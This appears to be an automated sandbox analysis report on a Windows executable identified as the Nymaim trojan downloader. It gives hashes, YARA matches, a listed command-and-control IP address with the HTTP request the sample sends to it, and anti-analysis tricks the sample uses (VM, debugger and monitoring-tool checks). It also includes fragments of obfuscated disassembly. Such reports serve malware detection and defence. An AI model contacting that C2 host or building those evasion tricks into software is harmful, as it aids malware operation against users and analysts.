Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565680
MD5: d2a93d9f269cbd3b444400d586999e01
SHA1: 3d9df1a3c04f61e2ed1f89a0fc42021dd120546b
SHA256: f4c52e24f469d177317286ffccf86673a2ab2fb4164a47fd1898151b85a13e05
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D2A93D9F269CBD3B444400D586999E01)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Nymaim | Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim
{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source | Rule | Description | Author | Strings
00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.2.file.exe.4950e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.3.file.exe.4a40000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
0.2.file.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0 | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.4a40000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04953837 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Networking

Source: Malware configuration extractor | IPs: 185.156.72.65 (4 identical entries)
Source: Joe Sandbox View | IP Address: 185.156.72.65 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65 (50 identical entries)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: global traffic | HTTP traffic detected (13 identical requests):
    GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
    User-Agent: 1
    Host: 185.156.72.65
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/K
Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-0
Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1002
Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub767
Source: file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubL
Source: file.exe, 00000000.00000002.4100010455.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4100010455.0000000000CCB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl

E-Banking Fraud

Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.4950e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1671985450.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410940
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041A346
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403D40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00415E59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404F70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041572E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDA5C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F2A52
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E8A42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005A8A25
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E5374
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F7320
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00587B2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00473BFC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00496466
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DFC9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EF55C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4544
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E3DC2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EC5BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E6F24
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0048EF9F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00707331
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_049551D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495EE2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04953FA7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04965995
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_049551D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495B937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495F170
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04960BA7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0495AA07 appears 34 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4101510362.0000000004950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9955546709129511
Source: file.exe | Static PE information: Section: encvjseq ZLIB complexity 0.9922970530236634
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect, GetLastError, FormatMessageA, LocalAlloc, OutputDebugStringA, LocalFree, LocalFree, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_047A8464 CreateToolhelp32Snapshot, Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo 0_2_004087E0
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 36%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2024448 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of encvjseq is bigger than: 0x100000 < 0x1abe00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;encvjseq:EW;schszwjt:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1f1d49 should be: 0x1ee96b
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: encvjseq
Source: file.exe | Static PE information: section name: schszwjt
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00421B7D push esi; ret 0_2_00421B86
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 4A9A039Bh; mov dword ptr [esp], esi 0_2_005F1095
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 143758B0h; mov dword ptr [esp], edx 0_2_005F10D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 1AB64C36h; mov dword ptr [esp], ebx 0_2_005F1110
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push edi; mov dword ptr [esp], ebx 0_2_005F1144
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 1B693A1Dh; mov dword ptr [esp], esi 0_2_005F11B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ecx; mov dword ptr [esp], edx 0_2_005F1209
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 11D166E9h; mov dword ptr [esp], edi 0_2_005F122E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 6E5359C6h; mov dword ptr [esp], ebp 0_2_005F125D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 00E79D54h; mov dword ptr [esp], ebp 0_2_005F12B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push edi; mov dword ptr [esp], 0E1A9CB1h 0_2_005F12C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ecx; mov dword ptr [esp], edi 0_2_005F137F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push edx; mov dword ptr [esp], edi 0_2_005F13AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 545A6213h; mov dword ptr [esp], ebp 0_2_005F13EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ebx; mov dword ptr [esp], edx 0_2_005F147D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 53414C7Bh; mov dword ptr [esp], esi 0_2_005F148F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push edx; mov dword ptr [esp], eax 0_2_005F1564
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push 57975B01h; mov dword ptr [esp], edi 0_2_005F15BF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push esi; mov dword ptr [esp], 4BBB87A0h 0_2_005F15C3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ecx; mov dword ptr [esp], ebp 0_2_005F161F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ebp; mov dword ptr [esp], eax 0_2_005F1644
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ebx; mov dword ptr [esp], edx 0_2_005F16BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push eax; mov dword ptr [esp], 2AFF71EFh 0_2_005F170B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ebx; mov dword ptr [esp], edx 0_2_005F1789
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F108D push ebp; mov dword ptr [esp], 61F643D7h 0_2_005F1795
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push esi; mov dword ptr [esp], edx0_2_005F17C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push edi; mov dword ptr [esp], edx0_2_005F1804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push 56BBC826h; mov dword ptr [esp], esi0_2_005F182B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push esi; mov dword ptr [esp], 00000062h0_2_005F1853
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F108D push ebp; mov dword ptr [esp], esi0_2_005F18F9
                Source: file.exeStatic PE information: section name: entropy: 7.944720387530333
                Source: file.exeStatic PE information: section name: encvjseq entropy: 7.950828634969012

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640D4D second address: 640D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640D51 second address: 640D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B5F second address: 642B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B63 second address: 642B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642B69 second address: 642B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7174BA6FD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B52 second address: 643B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B57 second address: 643B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 643B5D second address: 643BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+1245B126h], edi 0x00000010 je 00007F7174CEBA8Bh 0x00000016 or di, F136h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F7174CEBA88h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F7174CEBA88h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 add bh, FFFFFFBEh 0x00000056 mov edi, eax 0x00000058 call 00007F7174CEBA95h 0x0000005d mov edi, dword ptr [ebp+1245B3E7h] 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 push edi 0x00000069 pop edi 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 644D9D second address: 644DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642D6E second address: 642D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646AD3 second address: 646AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646AD7 second address: 646B3A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7174CEBA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7174CEBA8Ch 0x0000000f popad 0x00000010 nop 0x00000011 mov di, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F7174CEBA88h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 jmp 00007F7174CEBA8Ah 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D38ABh] 0x0000003d jmp 00007F7174CEBA92h 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push edi 0x00000047 pop edi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649875 second address: 6498EA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7174BA6FD8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F7174BA6FD8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 add ebx, 5C4E2F07h 0x00000048 jmp 00007F7174BA6FDBh 0x0000004d push 00000000h 0x0000004f je 00007F7174BA6FD6h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489D0 second address: 6489D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6498EA second address: 6498EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489D5 second address: 6489DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6489DC second address: 648A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F7174BA6FD8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 jmp 00007F7174BA6FE3h 0x00000027 xor dword ptr [ebp+122D30E5h], ecx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movsx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e jg 00007F7174BA6FF2h 0x00000044 mov eax, dword ptr [ebp+122D1245h] 0x0000004a call 00007F7174BA6FDBh 0x0000004f mov dword ptr [ebp+1247F72Dh], edi 0x00000055 pop ebx 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push edi 0x0000005b call 00007F7174BA6FD8h 0x00000060 pop edi 0x00000061 mov dword ptr [esp+04h], edi 0x00000065 add dword ptr [esp+04h], 00000014h 0x0000006d inc edi 0x0000006e push edi 0x0000006f ret 0x00000070 pop edi 0x00000071 ret 